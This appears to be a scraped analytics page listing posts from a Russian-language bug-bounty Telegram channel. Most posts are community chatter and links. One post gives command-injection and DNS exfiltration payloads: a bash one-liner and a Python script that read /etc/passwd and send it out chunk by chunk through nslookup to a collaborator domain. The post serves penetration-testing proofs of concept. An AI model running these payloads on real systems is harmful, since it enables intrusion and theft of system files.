O seu período de teste terminou!
Para acesso total à funcionalidade, pague uma subscrição premium
BU
Омский багхантер
https://t.me/bughunter_omsk
Idade do canal
Criado
Linguagem
Japonês
1.21%
ER (semana)
8.97%
ERRAR (semana)

По всем вопросам: @arteb123

Mensagens Estatísticas
Repostagens e citações
Redes de publicação
Satélites
Contatos
História
Principais categorias
As principais categorias de mensagens aparecerão aqui.
Principais menções
Não foram detectadas menções significativas.
Encontrado 17 resultados
https://cheatsheetseries.owasp.org/Glossary.html
20.04.2025, 21:38
t.me/bughunter_omsk/119
21.03.2025, 19:14
t.me/bughunter_omsk/118
Смотрите что нашел 😏
15.03.2025, 17:08
t.me/bughunter_omsk/117
15.03.2025, 17:08
t.me/bughunter_omsk/116
Добро пожаловать в Омское бб
by @tembitt
3.03.2025, 17:22
t.me/bughunter_omsk/115
Repostar
8
2
154
😆 (Не)секретный чатик багхантеров

А вы знаете, что у нашего комьюнити есть чат, в котором общаются исследователи и команда платформы? Там уже больше 250 человек, не хватает только вас!

Залетайте в чат, чтобы:

🔵Общаться с другими хантерами.
🔵Получать помощь и делиться опытом.
🔵Быть на связи с командой платформы.
🔵Оставаться в курсе новостей.
🔵Вместе посещать багбаунти-ивенты.
🔵Делиться мемами и просто болтать о багхантинге.

Присоединяйтесь, будем вместе прокачиваться в работе с уязвимостями ;)
28.02.2025, 12:48
t.me/bughunter_omsk/114
Repostar
15
16
216
Встретился тут с ситуацией, когда есть RCE, но вытащить выводы команд можно было только через DNS'ку:


name=val`ping -с 1 $(whoami).collaborator`ue


Получение вывода root в поддомене, конечно, приятно, но хотелось что-то валиднее для PoC'а. Однако, нужно помнить:


Максимальная длина доменного имени, включая поддомены, составляет 253 символа. Однако каждый отдельный уровень домена не может превышать 63 символа.


Поэтому я тут чуть посидел, почитал статейки, сам что-то пописал на баше и получил 2 удобные нагрузки для использования:

Получение части от вывода команды

Логика работы: исполнение команды, обрезание её вывода до диапазона от 1 до 30 символа(далее меняете под себя), после чего это всё кодируется в base64 и отправляется в поддомене


`ping -c 1 $(id | cut -c1-30| base64 | tr -d '=').domain.com`


Чтение всего файла по частям

Логика работы: файл читается построчно, если вся закодированная в base64 строка маленькая(40 символов), то отправляется DNS-запрос с base64 данными в поддомене(перед строкой добавляется L{номер_строки} и дальше уже идут base64 данные). Если строка длиннее, то она отправляется кусками с префиксом для удобства(L{номер_строки}P{какая_часть_от_base64_строки}D и потом данные)


bash -c 'border=40; domain=".collaborator"; delay=3; lineNumber=1; while IFS= read -r line; do encoded=$(echo -n "$line" | base64 | tr -d "="); parts=$(echo "$encoded" | fold -w "$border"); part=1; echo "$parts" | while read -r chunk; do if [ $(echo "$parts" | wc -l) -gt 1 ]; then nslookup "L${lineNumber}P${part}D${chunk}${domain}"; else nslookup "L${lineNumber}${chunk}${domain}"; fi; sleep "$delay"; part=$((part + 1)); done; lineNumber=$((lineNumber + 1)); done < /etc/passwd'


Данный bash я делал по ранее написанному python-коду:


import os, base64, time

border, domain, delay = 40, ".collaborator", 3

with open('/etc/passwd') as file:
for lineNumber, line in enumerate(file, 1):
encoded = base64.b64encode(line.strip().encode()).decode().replace('=', '')
parts = [encoded[i:i+border] for i in range(0, len(encoded), border)]

for part, chunk in enumerate(parts, 1):
os.system(f'nslookup "L{lineNumber}{f"P{part}D" if len(parts) > 1 else ""}{chunk}{domain}"')
time.sleep(delay)


Также попутно хочу поделиться полезными ссылками по этой теме:
- https://notsosecure.com/out-band-exploitation-oob-cheatsheet
- https://github.com/dhmosfunk/DNSEXFIL
- https://gist.github.com/Spix0r/6b38a02be0409ba3679d71c30a6db9a9

P.S. Если base64 не катит, то просто поменяйте на hex
18.02.2025, 17:05
t.me/bughunter_omsk/112
Repostar
18
378
18.02.2025, 17:05
t.me/bughunter_omsk/113
Вы же не забыли отправить «валентинки» в багбаунти программы?
15.02.2025, 20:04
t.me/bughunter_omsk/111
Обнаружил хорошую доку по внутреннему пентесту/редтиму. Рокет сайнса здесь нет, но для актуализации знаний прям что надо.

Тоже самое, но только в виде репозитория: тык
13.02.2025, 11:51
t.me/bughunter_omsk/110
Традиционное базированное фото с любимой
7.02.2025, 10:49
t.me/bughunter_omsk/109
7.02.2025, 03:03
t.me/bughunter_omsk/108
Получается, слетал в рабочую командировку на концерт Билана..🫡
7.02.2025, 03:03
t.me/bughunter_omsk/107
Получается, слетал в рабочую командировку на концерт Билана..🫡
7.02.2025, 02:59
t.me/bughunter_omsk/106
2.02.2025, 18:14
t.me/bughunter_omsk/105
Тут кажется DeepSeek протек.
Но это же ведь не повод не загружать туда сорцы с апи ключами? 🧐

Хорошая новость - уязвимость уже закрыли.
Плохая новость - уязвимостью уже мог кто-то воспользоваться.
30.01.2025, 01:20
t.me/bughunter_omsk/104
Если когда-нибудь на стендоффе выйдет багбаунти с Омской областью, то там будет всего одно недопустимое событие - покинуть Омск
27.01.2025, 22:15
t.me/bughunter_omsk/103
Os resultados da pesquisa são limitados a 100 mensagens.
Esses recursos estão disponíveis apenas para usuários premium.
Você precisa recarregar o saldo da sua conta para usá-los.
Filtro
Tipo de mensagem
Cronologia de mensagens semelhante:
Data, mais novo primeiro
Mensagens semelhantes não encontradas
Mensagens
Encontre avatares semelhantes
Canais 0
Alta
Título
Assinantes
Nenhum resultado corresponde aos seus critérios de pesquisa